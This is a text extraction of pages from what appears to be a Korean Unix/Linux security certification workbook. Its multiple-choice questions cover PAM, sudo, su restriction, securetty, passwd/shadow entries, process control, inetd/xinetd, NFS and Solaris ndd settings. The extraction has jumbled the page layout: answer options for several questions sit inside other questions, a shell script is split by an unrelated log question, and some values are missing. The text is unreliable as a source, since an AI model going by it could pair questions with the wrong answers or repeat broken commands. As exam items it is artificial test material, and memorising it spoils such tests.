71 99. 사용자 계정의 패스워드 암호화 설정에 대한 내용 중 틀린 것을 고르면? 1 /etc/shadow는 일반 계정에게 읽기 권한을 주지 않 는다. 2 /etc/passwd를 암호화시켜 쓰기 권한을 주지 않는 다. 3 각 사용자의 홈디렉터리는 others의 쓰기 권한을 제어해야 한다. 4 /etc/shadow 파일을 다른 곳으로 링크를 시켜 파일 에 대한 접근 권한을 제어한다 리눅스 시스템에서 PAM(Pluggable Authentication Module:장착식 인증 모듈)은 사용자를 인증하기 위한 유연한 메커니즘으로 사용된다. 아래 내용은 rlogin 어플리케이션에 대한 PAM 설정 파일이 다. PAM 라이브러리가 모듈의 응답을 어떻게 처리하 는지 정의하기 위해 컨트롤 플래그(control flag)가 사 용된다. PAM module control flag에 대한 설명으로 옳지 않은 것은? [root@linux]# more /etc/pam.d/rlogin auth required /lib/security/pam_securetty.so auth sufficient /lib/security/pam_rhosts_auth.so auth required /lib/security/pam_pwdb.so shadow nullok auth required /lib/security/pam_nologin.so account required /lib/security/pam_pwdb.so password required /lib/security/pam_cracklib.so password required /lib/security/pam_pwdb.so shadow nullok use_authok session required /lib/security/pam_pwdb.so 1 required가 설정되어 있다면 같은 라인에 명시된 모듈의 성공이 필수적이어야 한다. 2 requisite가 설정되어 있다면 PAM라이브러리가 실 패 응답을 받자마자 인증 절차는 재시도를 하게 된다. 3 sufficient가 설정되어 있다면 성공이라는 응답을 받 으면 인증이 완료되는 것으로 간주된다. 4 optional 설정은 모듈의 성공/실패 응답을 중요하지 않게 생각하고 거의 사용되지 않는다 리눅스 시스템에서 root는 무한대의 권한을 가지 고 있다. 따라서 침입자들은 root 권한을 얻어내려고 한다. 원격에서 root 계정으로 로그인하지 못하도록 설 정을 하고 일반 계정으로 로그인한 후 su를 사용해서 root가 될 수 있도록 하고 있다. 여기서 su를 사용하는 대신 sudo를 사용하면 몇 가지 장점이 있다고 한다. sudo를 사용하는 장점으로 볼 수 없는 것은? 1 root 패스워드를 효율적으로 관리할 수 있다. 2 root가 시스템 상에서 작업하는 시간이 길어진다. 3 command 단위의 로깅이 가능하므로 log 추적이 쉬워진다. 4 누가 어떤 작업을 했는지가 명확해지므로 관리의 권한과 책임이 명확해진다 초보 관리자가 리눅스 시스템에서 일반 사용자의 root 권한에 대한 제한적 사용을 위해 sudo를 설치했 다고 한다. 아래 내용은 /etc/sudoers 의 일부분이다. 이때 sudo 사용에 대한 일반적인 내용으로 맞지 않는 것은? # visudo # sudoers file. # # This file MUST be edited with the 'visudo' command as root. # # See the man page for the details on how to write a sudoers file. # # Host alias specification # User alias specification # Cmnd alias specification # User privilege specification root ALL=(ALL) ALL stenvs ALL=(ALL) ALL kisa1 kisa=(operator) /bin/ls, (root)/bin/kill, /usr/bin/lprm 1 /etc/sudoers 파일을 편집할 경우 vi 대신 visudo를 실행시켜서 사용할 수 있다. 2 root, stenvs는 sudo 명령을 사용할 수 있도록 설정 되어 있다. 3 kisa1 사용자는 kisa 시스템에서 operator 권한으로 ls, root 권한으로 kill, lprm명령을 사용할 수 있다. 4 root 권한으로 /etc/passwd 파일을 편집하기 위해 #sudo vi /etc/passwd 실행 시 root 패스워드를 입 력해야한다 리눅스 시스템에서 공격자가 루트의 패스워드를 알아냈다고 하는 경우 자신의 계정으로 접속을 하여 su명령어를 입력하여 루트의 권한을 얻으려고 할 것이 다. 이때 su 명령어의 사용자를 제한하여 두었을 경우 엔 허가받지 않은 사용자가 루트의 권한을 행사하는 사태를 막을 수 있다. 이때 su 사용자를 제한하기 위 해 해야 할 작업으로 옳은 것을 모두 고르면? 71
72 1 /etc/pam.d/su 파일에 사용자 인증 모듈을 위한 설 정을 추가한다. 2 /etc/group 파일에 wheel 그룹에 su 명령어를 사용 할 사용자를 추가한다. 3 su 명령 사용을 원하는 사용자에 대한 UID 값을 새롭게 변경하여 준다. 4 su 명령 사용을 위한 GID와 UID값을 root 사용자 와 같게 변경하여 준다 다음 아래의 스크립트의 의미는 무엇인가? finger grep -v root grep -v oracle grep svc cut -c32-47 > /tmp/_list cat /tmp/_list cut -c1-7 > /tmp/col1;cat /tmp/_list cut -c8-16 > /tmp/col2 _tab='paste -d" " /tmp/col2 /tmp/col 최근 리눅스 시스템을 운영, 관리하는 시스템 관 리자는 /var/log/messages 로그 파일에 다음과 같은 로그 기록이 남아있는 것을 발견했다고 한다. 이 로그 분석에 대한 설명으로 옳지 않은 것은? Mar 14 16:34:13 kisa sshd[1799]: Accepted password for kisa1 from port 1035 ssh2 Mar 14 16:34:13 kisa PAM_유닉스[1799]: (system-auth) session opened for user kisa1 by (uid=0) Mar 14 16:34:25 kisa PAM-Wheel[1831]: Access denied for 'kisa1' to 'root' Mar 14 16:34:49 kisa sshd[1835]: Accepted password for kisa2 from port 1036 ssh2 Mar 14 16:34:49 kisa PAM_유닉스[1835]: (system-auth) session opened for user kisa2 by (uid=0) Mar 14 16:34:53 kisa PAM-Wheel[1860]: Access granted to 'kisa2' for 'root' Mar 14 16:34:56 kisa PAM_유닉스[1860]: (system-auth) session opened for user root by kisa2(uid=500) 1 위 내용은 su 명령 사용이 허용되어 있는 사용자와 그렇지 않은 사용자가 su 명령을 사용했을 경우이 다. 2 kisa2 사용자는 su 명령 사용을 위해 /etc/group파 일에서 wheel그룹의 사용자로 등록되어 있다. 3 kisa1 사용자는 su 명령 사용을 위해 /etc/group파 일에서 wheel그룹의 사용자로 등록되어 있지 않다. 4 kisa1, kisa2 사용자는 /etc/pam.d/su 파일에 wheel 그룹뿐만 아니라 사용자 계정에 대해서도 등록되 어 있다. grep -v " " grep -v " [1-9]" cut -c11-17' for i in $_tab do /etc/fuser -k /dev/tty$i done 1 host로 로그인한 유저 중에 idle time이 10분 이상 초과한 user를 자동으로 kill한다. 2 /tmp 내의 필요 n없는 임시 파일을 주기적으로 제 거한다. 3 시스템에 접속한 사용자들이 사용하고 있는 디바이 스 목록을 나타낸다. 4 시스템에 접속한 루트(root)를 제외한 모든 사용자 를 kill 한다 아래 내용은 리눅스 시스템에서 lastlog 명령을 이용하여 사용자의 로그인 상황을 점검한 결과를 보여 주고 있다. 결과를 살펴본 결과 시스템에 접근해서는 안 될 사용자가 로그인한 사실을 알게 되었다. 그래서 관리자는 사용자 로그인 보안에 대해 더욱 더 신경을 쓰고자 하려고 한다. 이에 대한 대처 방법으로 틀린 것은? [root@kisa /root]#lastlog Username Port From Latest root tty1 Mon Jun 11 01:06: bin **Never logged in** daemon **Never logged in** adm **Never logged in** lp **Never logged in** shutdown **Never logged in** halt **Never logged in** mail **Never logged in** ---- 중략 --- kisa Thu Jun 3 01:06: 일시적으로 사용자 계정을 사용 못하게 하려면 /etc/passwd의 암호 필드를 공란으로 지운다. 72
73 2 root는 특별한 경우가 아니면 일반 사용자 계정으 로 접속 후 su를 사용한다. 3 root에 대한 암호를 지정하고, /etc/securetty 파일 에 루트로 로그인할 수 있는 터미널 설정을 가급 적 삼가 한다. 4 텔넷이나 FTP로의 로그인은 스니핑의 위험 요소를 가지고 있기 때문에 가능하면 SSH을 사용하도록 권장한다 계정과 암호를 외부의 공격으로부터 방어하는 방 법으로 옳지 않은 것은? 1 사용자가 일정기간마다 암호를 다시 설정하도록 한 다. 2 사용자가 암호를 만들 때 일정한 공식에 의해 만들 도록 한다. 3 사용자가 암호를 설정할 때 충분히 복잡하게 만들 도록 한다. 4 몇 번의 로그 실패 후 일정시간 동안 해당 계정의 접근을 제한한다 평소 HP-UX 시스템을 사용하는 인터넷 회사에서 관리자가 원격에서 시스템에 root로 로그인하고자 하 는데 아래와 같은 메시지를 보여줬다면 무슨 작업을 해줘야 하는가?(아래 내용은 /etc/securetty 파일의 설 정 내용을 보여주고 있다.) > HP-UX bada B U 9000/800 (t0) > > login: root > Password: > Account is disabled - see Account Administrator > > Wait for login exit:.. > Connection closed by foreign host. # more /etc/securetty vc/1 vc/2 vc/3 tty1 tty2 tty3 #ttyp1 #ttyp2 #ttyp3 ttys0 ttys1 ttys2 1 ttys0, ttys1, ttys2에 대해 주석 처리를 해준다. 2 tty4, tty5, tty6를 추가 기입해준다. 3 주석 처리되어 있는 ttyp1, ttyp2, ttyp3에 대해 주 석을 없앤다. 4 mv /etc/securetty /etc/securetty.org과 같이 securetty 파일을 다른 이름으로 변경하면 root로 telnet을 이용할 수 있다 HP-UX 시스템 보안 설정 중 패스워드 및 사용자 계정 설정에 대한 설명이다. 다음 중 옳지 않은 것은? 1 패스워드 형식을 설정: 패스워드의 제약 조건, 안전 한 패스워드 제안 2 패스워드 교체 형식을 설정: 패스워드 aging을 할 지 여부, 어떤 간격으로 할지 설정 3 사용자 계정에 sulog 사용: 제한 설정 4 터미널 보안에 관한 설정(Terminal security policies): 로그인 횟수 제한, 로그인 타임아웃 설정 73
74 110. 사용자 계정에 대한 비밀번호 생성 시 보안상 안 전하다고 볼 수 없는 것은? (Solaris 7 기준의 C-2 level 이상을 구현한 MD5, hash 방식을 지원하는 시스 템의 경우) 1 숫자와 영문자를 조합하여 8자 이상으로 구성한다. 2 특수문자와 숫자를 조합하여 8자 이상으로 구성한 다. 3 스페이스 키 등을 조합하여 8자 이상으로 구성한 다. 4 주민번호, 전화번호와 같은 숫자로 구성한다 다음은 유닉스 시스템 환경에서 할 수 있는 계정 보안 방법으로 옳지 않은 것은? 1 root 계정에 대한 접속을 제한하고자 할 경우에는 /etc/security 설정 파일을 통해 접속을 제한할 수 있다. 2 PAM 모듈을 이용해서 특정 사용자, 특정 그룹, 특 정 시간대에 로그인하는 것을 설정할 수 있다. 3 사용자 패스워드를 숨기기 위한 방법으로 shadow 패스워드를 사용하여 계정을 보안할 수 있다. 4 네트워크 도청(sniffing)을 방지하기 위한 방법으로 서브 네트워크를 나누고 각각을 Hub로 연결한다 AIX 유닉스 시스템을 사용하는 한 회사에서 쉘 상에서 아래와 같은 작업을 하였을 때, 벌어질 수 있 는 상황 혹은 무슨 목적으로 이러한 작업을 했다고 보 이는가? #smitty user 원하는 사용자 선택(예를 들어, user1선택) User Can LOGIN REMOTELY? (false선택) 1 user1이라는 사용자를 원격에서 이 시스템에 대해 rsh, rlogin, telnet으로 접속 가능하도록 한 것이다. 2 user1이라는 사용자를 원격에서 이 시스템에 대해 rsh, rlogin, telnet으로 접속 불가능하도록 한 것이 다. 3 user1이라는 사용자는 원격에서의 rsh, rlogin, telnet, ftp 등 모든 접속을 차단하기 위한 설정이 다. 4 user1이라는 사용자는 원격에서 이 시스템에 대해 rsh, rlogin, telnet 방법으로는 접속 불가능하지만, ftp는 가능하다 관리자가 유닉스 시스템 점검 시 필수로 확인해 봐야 하는 파일은 passwd 파일과 shadow 파일이다. 사용자 계정을 담당하고 있는 passwd 파일과 shadow 파일에 대한 설명으로 옳지 않은 것은? # more /etc/passwd root:x:0:1:super-user:/root:/usr/local/bin/bash daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:admin:/var/adm: listen:x:37:4:network Admin:/usr/net/nls: nobody:x:60001:60001:nobody:/: khlee:x:0:1:good Admin:/: khjang:x:1001:10::/export/khjang:/bin/csh # more /etc/shadow root:hm2fiw/nrp4rc:11485:::::: daemon:np:6445:::::: bin:np:6445:::::: sys:np:6445:::::: adm:np:6445:::::: listen:*lk*::::::: khlee:np:6445:::::: khjang::11611:::::: 1 passwd 파일에서 khlee 사용자는 UID 값 0으로 세 팅되어 있어서 root 권한을 획득할 수 있다. 2 passwd 파일에서 "x"로 표시되어 있는 것은 shadow파일에 비밀번호를 별도로 관리하고 있다는 것을 말한다. 3 shadow 파일에서 khjang 사용자는 암호화 부분이 빈칸으로 되어 있으므로 비밀번호 없이 시스템에 로그인이 가능하다. 4 *LK*는 locking의 의미로서 계정을 잠겨 놓은 상태 이며 NP는 시스템에서 예약된 패스워드로 정의되 어 있다는 표시이다 Solaris 7 시스템 상에서 프린터 정보를 볼 수 있 는 디렉터리의 올바른 경로는? 1 /etc/printcap 2 /dev/term/ 3 /usr/share/lib/terminfo/ 4 /usr/lib/printinfo/ 74
75 115. 유닉스 시스템에서 침해 의심이 가는 계정이 사 용 중인 모든 프로세스를 제거하는 방법은? 1 kill -user 3 prvconf 2 pkill -U uid 4 raise 116. 유닉스 시스템에서 주어진 시간 할당량 안에 실 행을 마쳐야 하며 만약 실행이 끝나지 않은 프로세스 는 다시 준비큐의 맨 뒤로 돌아가 다음 차례를 기다리 는 스케줄링 방식은? 1 RR(Round Robin) 2 FIFO 3 SJF(Shortest Job First) 4SRT(Shortest Remaining Time) 117. 현재 유닉스 시스템 상에서 시행 중인 프로세스 가 참조하는 파일에 대한 정보를 보여주는 도구는 다 음 중 무엇인가? 1 fportn 3 COPS 2 tripwire 4 lsof 118. 아래 설명에 해당 하는 것은? 프로그램의 메모리를 다른 계정에 의한 변경이나 위 조로부터 보호하기 위해 사용되는 레지스터로, 가용 메모리의 하위 값을 나타낸다. 1 바운드 레지스터 2 Data 명령의 베이스 레지스터 3 태그 부착 아키텍처 4 페이징/세그먼트 120. 다음 아래 설명에 해당하는 것은? 메모리를 여러 개의 조각으로 분리해서 프로그 램을 재배치할 수 있게 하면 베이스/바운드 레 지스터를 무제한적으로 사용케 하는 효과를 얻 을 수 있다. 1 바운드 레지스터 2 베이스 레지스터 3 태그 부착 아키텍처 4 페이징/세그먼트 121. 임계구역을 위해 각 프로세스는 동기화된 도구를 통해 임계구역의 제한 조건을 지킬 수 있는 자료를 함 께 공유하게 된다. 이러한 동기화된 도구에 대한 명칭 은 무엇인가? 1 세마포아 2 교착상태 3 임계구역 4 시스템 호출 122. 일반 계정의 디스크 사용 제한의 한 가지 방법인 disk quota(디스크 사용제한)를 설정하는 방법에 대한 설명이다. 다음 중 옳지 않은 것은? 1 한 사용자가 사용할 수 있는 파일과 파일 블록의 크기를 제한할 수 있다. 2 사용자 홈디렉터리가 있는 파일시스템에 quota를 설정할 수 있다. 3 하드 디스크의 크기, 사용자의 수, 사용자의 작업 내용을 고려하여 알맞게 설정할 수 있다. 4 시스템 재부팅 시에 quota를 수행하지 않으면 부팅 시간이 길어진다 다음 설명에 해당하는 것은? 메모리 내의 모든 워드에 접근 권한 식별을 나타내 는 부가적인 비트를 사용해서 데이터 값의 일부는 보호하고 나머지 부분은 다른 사용자의 접근을 허용 하게 한다 1 바운드 레지스터 2 베이스 레지스터 3 태그 부착 아키텍처 4 페이징/세그먼트 123. SUID, SGID, Sticky bit를 설명한 것으로 옳지 못 한 것은? 1 SUID, SGID를 가지고 있다면 그 파일을 실행하도 록 허락된 모든 사용자, 그룹은 파일의 소유자처럼 취급된다. 2 Sticky bit는 디렉터리에 유용하며 디렉터리에 Write 권한이 있어도 root와 소유자 외에는 파일을 제거하지 못한다. 3 Sticky bit로 설정된 파일이 많으면 많을수록 공격 위험이 커지므로 불필요한 설정은 바꾸는 것이 좋 다. 4 특정 파일에 전에 없던 SUID가 설정됐거나, SUID 가 설정된 파일이 새로이 생겼다면 침입으로 의심 할 필요가 있다. 75
76 124. 리눅스 서버에서 각 사용자에 대해 속한 그룹별 로 디스크 할당량을 주려고 한다. 사용자 디렉터리가 /home이라고 할 때 다음 중 /etc/fstab 파일이 올바르 게 설정된 것은? 1 /dev/hda2 /home ext2 defaults /dev/hda2 /home ext2 defaults,usrquota /dev/hda2 /home ext2 defaults,grpquota /dev/hda2 /home ext2 defaults,noquota 유닉스 시스템에서 코어(core) 파일은 실행 중이 던 프로세스의 메모리 이미지를 담고 있는 파일이다. 이러한 코어 파일은 여러 가지 면에서 중요한 점을 가 지고 있는데 이에 대한 설명으로 옳지 않은 것은? 1 코어 파일은 시스템 내에서 필요 없는 공간을 소비 하고 있으므로 필요 시 코어 파일이 생성되지 않 도록 설정할 수 있다. 2 디폴트로 리눅스는 프로그램이 비정상적으로 종료 된 경우 모든 프로그램 메모리를 저장하고 있는 코어 파일을 생성한다. 3 솔라리스 시스템에서 코어 파일의 생성을 방지하기 위해서는 /etc/system 파일 내에 set sys:coredumpsize=0 을 추가해주면 된다. 4 리눅스 시스템에서는 코어 파일을 ulimit -a 명령어 를 통해서 hard 한도를 확인할 수 있다 리눅스 시스템에 크래커가 접속해 있는지 혹은 엄청난 파일을 업로드하면서 네트워크 트래픽을 유발 시킨 불법 사용자를 바로 차단하고자 할 때 조치 방법 으로 옳은 것을 모두 고르시오.(아래 내용은 접속해 있 는 사용자를 알아보기 위해 who라는 명령어 실행 시 보이는 메시지이다.) #who root tty1 Oct 12 08:47 kisa1 pts/14 Oct 12 14:47 1 kisa1 사용자에 대한 접속을 차단하기 위해서 # skill -KILL kisa1명령을 사용한다. 2 kisa1이 접속해있는 터미널을 대상으로 차단하기 위한 방법으로 # skill -KILL -v pts/14 명령을 사용 한다. 3 사용자가 실행한 프로세스를 찾아 #kill -9 PID명령 으로 죽이는 방법 밖에 없다. 4 사용자가 실행한 프로세스를 찾아 #killall -9 process_name을 사용하여 프로세스를 죽인다 다음은 리눅스 서버에서 프로세스의 상태를 트리 로 보여주는 명령(도구)을 실행시킨 결과이다. 어떤 명 령을 사용하였는가? init-+-crond -login---sh -5*[mingetty]... -syslogd `-xinetd---in.telnetd---login---sh---pstree 1 ps 2 pstree 3 netstat 4 lsof 128. 아래는 리눅스 서버에서 ps를 실행시킨 결과이다. 아래 프로세스 중 다른 모든 프로세스의 부모 프로세 스 역할을 하는 것은? root Apr19? 00:01:10 init : 1 root Apr25 tty1 00:00:00 login -- root : 2 root Apr25 tty1 00:00:00 -sh : 3 root Apr26? 00:00:00 xinetd : 리눅스 시스템에서 사용되는 프로세스 테이블에 대한 설명으로 옳은 것은? 1 UID : 프로세스 소유자의 username 2 STAT : 프로세스의 과거 상태 3 SZ : K 단위 혹은 페이지 단위의 가상메모리 사용 량 4 nice : 사용자가 정의한 우선순위 변경 값 130. AIX 유닉스 시스템을 사용하고 있는 도중에 아 래와 같은 메시지를 보게 되었다. 그렇다면, 아래에 있 는 메시지에서 defunct에 대한 설명 중 옳지 않다고 생각하는 것은? PID PPID C TIME CMD :00 defunct 1 defunct는 흔히 Zombi Process라고 하는 것으로 알려져 있다. 2 현재 메시지 상태는 종료를 못하고 제 기능을 못하 고 있는 프로세스의 상태를 말하는 것이다. 3 위의 경우는 종료는 했지만, 정상적으로 PID를 반 납하지 못하고서 PID의 테이블을 차지하고 있는 경우이다. 76
77 4 위의 경우와 반대로 정상적일 경우에는 Process 종 료 시 부모에게 알리고 자신이 가지고 있던 PID를 반납한다 다음은 리눅스 시스템에서 signal에 대한 사용과 번호에 대한 설명이다. 틀린 것은? 1 HUP -1 : Hangup(재실행을 하고자 하는 경우 발 생) 2 KILL -9 : Kill(실행을 정지한 후 다시 실행을 계속하 기 위한 대기) 3 SEGV -11 : Segment Violation(허가되지 않은 메모 리 영역 접근) 4 TERM -15 : Terminate(가능한 한 정상 종료) 132. AIX 유닉스 시스템을 운영하고 있는 모회사 시스 템관리자는 콘솔창에서 시스템 점검을 하는 도중 필요 없는 데몬이 올라와 있는 것을 보고, 몇몇 데몬들을 중지시키려고 한다. 이 때, 현재 활성화된 데몬을 보는 명령어와 시작, 중지시키는 명령어가 옳게 나열된 것 은? 1 lsdem -a, startsrc -s 데몬, stopsrc -s 데몬 2 lssrc -a, startsrc -s 데몬, stopsrc -s 데몬 3 ps -ef, /etc/rc.tcpip/데몬 start, /etc/rc.tcpip/데몬 stop 4 netstat -an, /etc/rc.nfs/데몬 start, /etc/rc.nfs/데몬 stop 133. 침해사고의 의심이 가는 증거를 발견하여 관리자 에게 메일을 보내는 명령은? 1 mail -s hi username 135. 솔라리스 유닉스 시스템에서는 TCP/IP 스택에 여 러 가지 사용자 인터페이스를 제공하는데, 시스템 관 리자들은 네트워크 커널 변수들을 튜닝하기 위한 가장 유용한 도구로써 ndd"를 사용함으로써 보안을 강화할 수 있다. ndd 사용 설명으로 옳지 않은 것은? 1 TCP/IP 커널에 대한 는 ARP, IP, TCP, UDP 중 하나 이며 각각의 드라이버에 대하여 모든 변수들을 보 는 명령어는 'ndd /dev/ \?' 이다. 2 ndd를 사용하여 커널 변수를 설정하기 위해서는 'ndd -set /dev/ ' 명령어를 실행하면 된다. 3 ndd를 사용하여 커널 변수 변경 후에는 설정된 값 이 계속적으로 적용되어 남아있기 때문에 시스템 재부팅 시에도 다시 설정할 필요가 없다. 4 Cache 테이블의 Lifetime 및 다수의 TCP 연결에 대 한 여러 가지 옵션을 통하여 Kernel Parameter의 설정 및 제어가 가능하다 AIX 유닉스 시스템을 기반으로 운영되던 인터넷 광고회사 파일서버의 텔넷 접근은 모두 23번 포트를 통해 접속을 해왔다. 하지만 외부 사용자에 의해 계속 해서 23번 포트로의 접근 시도가 증가하는 것을 보고 기존 telnet port를 1500번으로 바꾸기로 하였다면, 다 음 과정에 대한 설명 중 잘못된 것은? 1 먼저 vi 편집기로 /etc/services파일에서 telnet 23/tcp라인에 대한 주석처리 한다. 2 원하는 포트를 통해 telnet 접속을 정의하기 위해서 쉘 상에서 #telnet 1500/tcp 명령 실행 후 사용하 면 된다. 3 #telnet 1500/tcp 명령 실행 시 포트가 중복이 되 면 안 되고, #refresh -s inetd명령을 통해 inetd를 재실행해야 한다. 4 telnet 포트 변경 후, 해당 서버로 telnet 접속은 #telnet server_name(ip address)로 하면 된다. 2 mail username 3 mail username filename 4 mail username@machinename < filename 134. 솔라리스 서버를 기본 설정으로 두면 telnet 접속 시 시스템 정보를 배너로 보여준다. telnet 접속 시, 로 그인 후 나오는 배너를 변경하려고 할 때 수정해야 하 는 파일을 고르면? 137. NIS+(Network Information System)가 인스톨되었 다는 가정 하에 서버호스트 네임에 대하여 네이밍 서 비스를 설정하는 부분을 모두 고르면? 1 server's domain 2 server's hostname 3 server's IP address 4 server's Ethernet address 1 /etc/hosts 2 /etc/motd 3 /etc/inetd.conf 4 /bin/telnet 77
78 138. 유닉스 시스템에서 패킷의 입출력 상태, 라우팅 테이블 등을 보여주는 명령은? 1 nslookup 2 netstat 3 ifconfig -a 4 man inetd.conf 139. 유닉스 시스템 패킷의 입출력 상태, sync, ack를 보여주는 명령을 고르면? 1 netstat 2 traceroute 3 ifconfig -a 4 tcpdump 140. 유닉스 보안에 관련된 것이다. 설명으로 옳지 않 은 것을 모두 고르면? 1 NFS는 서버의 원격 관리에 필수적이므로, 안전한 시스템 운영을 위해서는 이를 사용하는 것이 좋다. 2 httpd를 관리자 권한으로 실행시키는 것은 보안상 취약하므로 nobody 권한으로 실행시킨다. 3 setuid와 setgid는 무척 유용하지만 보안상 취약성 이 많으므로 이 권한이 설정을 피하는 것이 좋다. 4 tcpdump로 네트워크 점검 시 Promiscuous Mode 로 수행되는 것은 sniffing을 의심할 수 있다 유닉스 시스템에서 네트워크 서비스에 관련된 설 정을 지정하는 파일은? 1 /etc/profile 2 /etc/hosts 3 /etc/inetd.conf 4 /etc/vfstab 144. 유닉스는 네트워크를 통해 데이터 port의 개방을 요구받는다. 시스템은 이것이 언제 요구되더라도 받아 들일 수 있도록 데몬이라는 것을 항상 띄워둔다. 이러 한 기능을 하는 데몬 중 하나가 inetd이다. inetd.conf 파일에 포함되어 있는 서비스에 대한 설명이다. 다음 설명 중 옳지 않은 것은? 1 echo :접속을 요청한 곳에서 보낸 임의의 데이터를 똑같이 그곳으로 돌려보내는 서비스 2 discard : 전송된 데이터를 단순히 버려버리는 서비 스 3 daytime : 전송되는 데이터와 상관없이 접속한 곳 으로 현재 날짜와 시각을 보내주는 서비스 4 comsat : inetd로의 접속 요청이 있을 때 rshd을 실행시켜 원격에서 rsh 명령을 해주는 서비스 141. 시스템의 신뢰 관계에 대한 보안 점검 사항 중 옳은 것을 모두 고르면? 1 /etc/hosts.equiv 파일이 존재하는지 점검한다. 존재 한다면 permission 설정이 700으로 되어 있는지 확인한다. 2 /etc/hosts.equiv 파일에 +, + + 가 포함되어 있 지 않은가 확인한다. 3 rlogin, rsh, rcp, rcmd 서비스가 수행되는지 확인한 다. 4 /etc/hosts.equiv 파일이 /dev/null로 심볼릭 링크로 설정되어 있는지 확인한다 유닉스 시스템에서 일반적인 열려진 서비스 포트 에 관한 설명이다. 잘못된 것은? (서비스 = 포트 번호 = 포트 종류) 1 FTP = 21 = TCP 2 SMTP = 25 = UDP 3 HTTP = 80 = TCP 4 DNS = 53 = TCP, UDP 145. OS(Operating System) 네트워크 서비스 보안에 대한 설명이다. 다음 중 옳지 않은 것은? : 1 외부로부터 NetBIOS를 이용한 불필요한 접근 제한 2 레지스트리에 Anonymous Network Access 접근 제한 3 Anonymous Network Access를 통한 정보 수집 제한 4 비인가된 직원의 전산실 출입 제한 146. 리눅스 시스템에서 호스트 이름을 IP 주소로 매 핑 하고자 할 때, (1) 시스템의 /etc/hosts 파일에 직접 주소를 가지고 있는 방법과 (2) DNS 서버를 쓰는 방 법이 있다. 평소에는 DNS 서버를 사용하다가 DNS 서 버가 다운되었을 때 hosts 파일을 찾도록 하려면 어떻 게 설정을 해야 하는가? 1 /etc/hosts 파일에 DNS 서버 주소를 저장한다. 2 /etc/host.conf 파일에서 DNS 서버부터 찾도록 설정한다. 3 /etc/resolv.conf 파일에서 DNS 서버 주소를 지정한다. 4 /etc/hosts 파일을 삭제한다. 78
79 147. 사내 인트라넷 서비스용으로 사용하는 솔라리스 시스템에서 TCP 포트 9999로 신규 서비스 myservice 를 제공하고자 한다. 다음 중 수정해야 하는 파일을 모두 고르면? 1 /etc/resolv.conf 2 /etc/services 3 /etc/inetd.conf 4 /etc/hosts 148. 유닉스 시스템에서 시스템의 local IP를 알 수 있 는 방법이 아닌 것은? 1 ifconfig 2 netstat 3 vi /etc/hosts 4 vi /etc/resolv.conf 149. 서버에서 실행되는 데몬들의 실행 모드(mode)에 는 크게 두 가지로 standalone 모드, 또 다른 하나는 inetd 모드(mode)이다. 인터넷 서비스를 정확하게 관 리하기 위해서는 이 두 가지에 대한 이해가 필요하다. 이에 대한 설명으로 옳지 않은 것은? 1 standalone 모드로 실행이 되는 데몬은 독립적 실 행이고, 서비스 요청 시 빠른 응답속도를 가진다. 2 standalone 모드로 서비스되는 대표적인 데몬으로 는 httpd, sendmail, named와 같은 것들이 있다. 3 inetd 모드는 필요한 경우에만 메모리로 적재되어 실행되기 때문에 standalone 모드로 모든 서비스를 제공하는 것이 일반적이다. 4 inetd 모드는 standalone 모드보다는 서버 부하를 상대적으로 줄일 수 있다 xinetd(extended Internet Services daemon)는 inetd의 문제점들을 보완하고 기능이 추가된 확장판으 로 볼 수 있다. 현재 redhat 7.0 이상의 버전에서는 기 본적으로 xinetd가 설치되고 있다. 아래 telnet을 위한 xinetd의 설정 내용에 대한 설명으로 맞지 않은 것은? service telnet { flags = REUSE NAMEINARGS protocol = tcp socket_type = stream wait = no user = telnetd access_times = 08:00-18:00 instances = 5 server = /usr/sbin/in.telnetd server_args = /usr/sbin/in.telnetd nice = 10 log_on_failure += USERID only_from /24 1 위의 내용으로 보아 기존의 tcp_wrapper를 사용해 서 telnet 서비스를 제공하도록 설정되어 있다. 2 위의 내용으로 보아 서비스 허용시간에 대한 제한 설정과 초당 허용하는 connection을 5로 설정해 두었다. 3 nice 명령어와 같이 서버 우선권을 10으로 설정해 두고 있다. 4 telnet 서비스가 단지 로컬 네트워크상에서만 허용 이 되도록 설정되어 있다 NIS+는 솔라리스용 네트워크 네임서비스 시스템 이다. 다음 중 NIS에 대한 설명으로 틀린 것은? 1 네임 서비스의 선택은 /etc/nsswitch.conf 파일에서 설정한다. 2 NIS+가 서비스되면 버퍼 오버플로 취약성으로 인 하여 root 권한을 빼앗길 수 있다. 3 클라이언트에서 showmount하면 NIS 내용을 볼 수 있다. 4 NIS를 사용하면 시스템 내의 각 호스트 클라이언트 들이나 서버 컴퓨터가 전체 시스템을 인식한다 솔라리스 NFS 서버에서 자신의 디렉터리를 export 하고자 할 때 사용하는 명령어는? 1 share 3 umount 2 mount 4 nfs 79
80 153. 엑스트라넷 환경 아래 사용하는 웹 서버에서 NFS를 사용하게 되면 공유 자료를 포함하고 있는 디 렉터리 계층을 공유할 수도 있고, 사용자의 홈디렉터 리를 공유할 수 있기 때문에 편리한 점이 많다. 하지 만, 내부 웹 서버에서 몇몇 조치를 취해줘야 할 필요 성이 있다. 이에 대한 조치방법으로 적절하지 않은 것 은? 1 익스포트(export)하고자 하는 파일 시스템은 분리된 파티션을 사용하고 nosuid 옵션을 설정한다. 2 가능한 익스포트(export) 파일 시스템을 엑스트라 넷, 쓰기 권한으로 한다. 3 NFS 서버는 기본적으로 루트로 원격에서 접근하는 것을 거부하도록 설정되어 있기 때문에 설정을 바 꾸지 않도록 한다. 4 신뢰할 수 없는 호스트로부터 portmapper 접근을 제한한다 솔라리스 시스템에서 TCP/IP 및 커널 튜닝을 위 한 도구로 ndd를 사용한다. 호스트에서 IP forwarding 을 못 하도록 ndd를 이용하여 설정하려고 할 때, 다음 중 적합한 명령을 고르면? 1 ndd -set /dev/hme ip_forwarding 0 2 ndd /dev/ip ip_forwarding 3 ndd -set /dev/ip ip_forwarding 0 4 ndd /dev/tcp ip_forwarding 155. 유닉스 시스템에서 보안상 취약한 'r' 명령을 일 반유저가 사용하지 못하도록 하고 싶다. 이 때 해당 파일들을 root 권한으로 생성한 후 permission을 0으 로 잠그면 일반유저가 생성이나 수정하지 못하게 된 다. 다음 중 이런 조치를 취해야 할 파일에 해당하지 않는 것은? 1.rhosts 2.sh_profile 3.netrc 4 hosts.equiv 156. telnet 접속 시 보안 문제로 root로 바로 login 못 하게 하고 login 후 su를 사용해 root로 접속하도록 해야 할 경우 솔라리스에서는 /etc/default/login에서 CONSOLE=/dev/console 부분을 활성화시키면 된다. AIX의 경우 위와 같은 설정을 원할 경우 해야 할 절차 가 아래에 있다. 아래에 있는 보기에서 문제에서 요구 하는 것을 만족하도록 해야 할 